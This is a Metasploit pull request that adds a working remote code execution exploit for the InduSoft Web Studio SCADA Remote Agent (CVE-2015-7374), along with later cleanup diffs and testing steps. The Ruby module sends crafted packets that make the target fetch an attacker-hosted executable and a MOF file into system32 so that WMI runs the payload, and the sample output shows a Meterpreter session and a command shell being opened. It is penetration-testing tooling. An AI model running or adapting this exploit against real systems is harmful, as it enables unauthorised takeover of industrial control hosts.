### PR TITLE
Add InduSoft Web Studio Arbitrary FileWrite Remote Code Execution

### DIFF
--- a/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
+++ b/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
@@ -1,0 +1,185 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'InduSoft Web Studio Arbitrary FileWrite Remote Code Execution',
+      'Description'    => %q{
+          This module exploits a lack of authentication and authorization on the InduSoft
+        Web Studio Remote Agent (Studio Manager.exe), that allows a remote attacker to write arbitrary files to
+        the filesystem, by abusing the functions provided by the software.
+
+        The module uses uses the Windows Management Instrumentation service to execute an
+        arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre
+        Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows
+        XP SP3 and Windows 2003 SP2.
+      },
+      'Author'         =>
+        [
+          'Steven Seeley' # Vulnerability Discovery + Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-7374' ],
+          [ 'ZDI', '15-451' ],
+          [ 'URL', 'http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2015-251-01' ]
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'    => 2048,
+          'BadChars' => "",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows XP / 2003', { } ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Sep 08 2015'))
+
+    register_options([
+        Opt::RPORT(1234),
+        OptInt.new('HTTPDELAY',    [false, 'Number of seconds the web server will wait before termination', 20])
+    ], self.class)
+  end
+
+  def str_to_uni_z(str)
+    enc = str.unpack("C*").pack("v*")
+    return enc
+  end
+
+  # not working for now...
+  def check
+    print_status("TODO")
+    return Exploit::CheckCode::Appears
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Client requests URI: #{request.uri}")
+    case request.uri
+    when /\.exe$/i
+        send_response(cli, @exe)
+    when /\.mof$/i
+        send_response(cli, @mof)
+    else
+        html = "oh hai"
+        send_response(cli, html)
+    end
+  end
+
+  def upload_file(filename)
+
+    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    download_file = "#{@uri}#{filename}"
+
+    if File.extname(filename) == ".exe"
+      print_status("sending WebGetFile(\"#{download_file}\", \"C:\\WINDOWS\\system32\\#{filename}\")")
+      exploit_string = str_to_uni_z("WebGetFile(\"#{download_file}\", \"C:\\WINDOWS\\system32\\#{filename}\")")
+    else
+      print_status("sending WebGetFile(\"#{download_file}\", \"C:\\WINDOWS\\system32\\wbem\\mof\\#{filename}\")")
+      exploit_string = str_to_uni_z("WebGetFile(\"#{download_file}\", \"C:\\WINDOWS\\system32\\wbem\\mof\\#{filename}\")")
+    end
+
+    pkt = hex_to_bin("02302500000000997f4336000900")
+    pkt << exploit_string
+    pkt << hex_to_bin("090030000a0003")
+
+    sock.put(pkt)
+    res = sock.get_once
+    return res
+  end
+
+  def bin_to_hex(s)
+    return s.unpack('H*').first
+  end
+
+  def hex_to_bin(s)
+    return s.scan(/../).map { |x| x.hex }.pack('c*')
+  end
+
+  def primer
+    print_status("Sending a malicious request to #{datastore['RHOST']}")
+
+    packets = Hash[
+        0 => hex_to_bin("02351031103810311031106c6f63616c686f73743a3030304332394138434332383030303003"),
+        1 => hex_to_bin("025703"),
+        2 => hex_to_bin("0250330003"),
+        3 => hex_to_bin("02300500000000837f56313303"),
+    ]
+    connect
+    sock.put(packets[0])
+    res = sock.get_once
+    sock.put(packets[1])
+    sock.put(packets[2])
+    sock.put(packets[3])
+    res = sock.get_once
+
+    host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    @uri = "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}/"
+
+    @peer = "#{rhost}:#{rport}"
+
+    @exe = generate_payload_exe
+    @exe_name = rand_text_alpha(rand(10)+5) + '.exe'
+    @mof_name = rand_text_alpha(rand(10)+5) + '.mof'
+    @mof      = generate_mof(@mof_name, @exe_name)
+
+    print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{@exe_name}")
+    res = upload_file("#{@exe_name}")
+    print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}")
+    res = upload_file("#{@mof_name}")
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, this is raised
+    end
+  end
+
+end
+
+=begin
+msf exploit(indusoft_webstudio_exec_new) > 
+[*] 192.168.172.136:1234 - Uploading the exe payload to C:\WINDOWS\system32\LEFnOE.exe
+[*] sending WebGetFile("http://10.0.0.3:8080/8GZUcCgW1q/LEFnOE.exe", "C:\WINDOWS\system32\LEFnOE.exe")
+[*] 10.0.0.3         indusoft_webstudio_exec_new - Client requests URI: /8GZUcCgW1q/LEFnOE.exe
+[*] 192.168.172.136:1234 - Uploading the mof file to c:\WINDOWS\system32\wbem\mof\ejBYIObTVcKsA.mof
+[*] sending WebGetFile("http://10.0.0.3:8080/8GZUcCgW1q/ejBYIObTVcKsA.mof", "C:\WINDOWS\system32\wbem\mof\ejBYIObTVcKsA.mof")
+[*] 10.0.0.3         indusoft_webstudio_exec_new - Client requests URI: /8GZUcCgW1q/ejBYIObTVcKsA.mof
+
+msf exploit(indusoft_webstudio_exec_new) > 
+[*] Sending stage (769536 bytes) to 10.0.0.3
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.3:48536) at 2014-09-22 17:59:30 -0400
+[*] Server stopped.
+
+msf exploit(indusoft_webstudio_exec_new) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 1988 created.
+Channel 1 created.
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\WINDOWS\system32>hostname
+hostname
+indusoft
+
+C:\WINDOWS\system32>
+=end

--- a/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
+++ b/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def upload_file(filename)
-    download_file = "#{@uri}#{filename}"
+    download_file = "#{@uri}/#{filename}"
 
     if File.extname(filename) == ".exe"
       print_status("sending WebGetFile(\"#{download_file}\", \"C:\\WINDOWS\\system32\\#{filename}\")")

--- a/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
+++ b/modules/exploits/windows/scada/indusoft_webstudio_download_rce.rb
@@ -40,8 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => true,
       'Payload'        =>
         {
-          'Space'    => 2048,
-          'BadChars' => "",
+          'Space'    => 2048
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -58,32 +57,22 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def str_to_uni_z(str)
-    enc = str.unpack("C*").pack("v*")
-    return enc
-  end
-
-  # not working for now...
-  def check
-    print_status("TODO")
-    return Exploit::CheckCode::Appears
+    str.unpack("C*").pack("v*")
   end
 
   def on_request_uri(cli, request)
     print_status("Client requests URI: #{request.uri}")
     case request.uri
     when /\.exe$/i
-        send_response(cli, @exe)
+      send_response(cli, @exe)
     when /\.mof$/i
-        send_response(cli, @mof)
+      send_response(cli, @mof)
     else
-        html = "oh hai"
-        send_response(cli, html)
+      send_not_found(cli)
     end
   end
 
   def upload_file(filename)
-
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
     download_file = "#{@uri}#{filename}"
 
     if File.extname(filename) == ".exe"
@@ -99,16 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote
     pkt << hex_to_bin("090030000a0003")
 
     sock.put(pkt)
-    res = sock.get_once
-    return res
+    sock.get_once
   end
 
   def bin_to_hex(s)
-    return s.unpack('H*').first
+    s.unpack('H*').first
   end
 
   def hex_to_bin(s)
-    return s.scan(/../).map { |x| x.hex }.pack('c*')
+    s.scan(/../).map { |x| x.hex }.pack('c*')
   end
 
   def primer
@@ -129,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = sock.get_once
 
     host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
-    @uri = "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}/"
+    @uri = get_uri
 
     @peer = "#{rhost}:#{rport}"
 
@@ -141,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{@exe_name}")
     res = upload_file("#{@exe_name}")
     print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}")
-    res = upload_file("#{@mof_name}")
+    upload_file("#{@mof_name}")
   end
 
   def exploit


### PR DESCRIPTION
Add exploit InduSoft Web Studio by Steven Seeley.

InduSoft Web Studio can be downloaded from:
http://www.indusoft.com/Products-Downloads/Previous-Versions-of-IWS
## Testing
- [ ] Prepare a Win XP or Win 2k3 box
- [ ] Install InduSoft Web Studio. Steven tested it with InduSoft Web Studio 6.1 SP6
- [ ] Try the module like the following provided by Steven:

```
msf exploit(indusoft_webstudio_exec_new) > 
[*] 192.168.172.136:1234 - Uploading the exe payload to C:\WINDOWS\system32\LEFnOE.exe
[*] sending WebGetFile("http://10.0.0.3:8080/8GZUcCgW1q/LEFnOE.exe", "C:\WINDOWS\system32\LEFnOE.exe")
[*] 10.0.0.3         indusoft_webstudio_exec_new - Client requests URI: /8GZUcCgW1q/LEFnOE.exe
[*] 192.168.172.136:1234 - Uploading the mof file to c:\WINDOWS\system32\wbem\mof\ejBYIObTVcKsA.mof
[*] sending WebGetFile("http://10.0.0.3:8080/8GZUcCgW1q/ejBYIObTVcKsA.mof", "C:\WINDOWS\system32\wbem\mof\ejBYIObTVcKsA.mof")
[*] 10.0.0.3         indusoft_webstudio_exec_new - Client requests URI: /8GZUcCgW1q/ejBYIObTVcKsA.mof

msf exploit(indusoft_webstudio_exec_new) > 
[*] Sending stage (769536 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.3:48536) at 2014-09-22 17:59:30 -0400
[*] Server stopped.

msf exploit(indusoft_webstudio_exec_new) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1988 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>hostname
hostname
indusoft

C:\WINDOWS\system32>
```
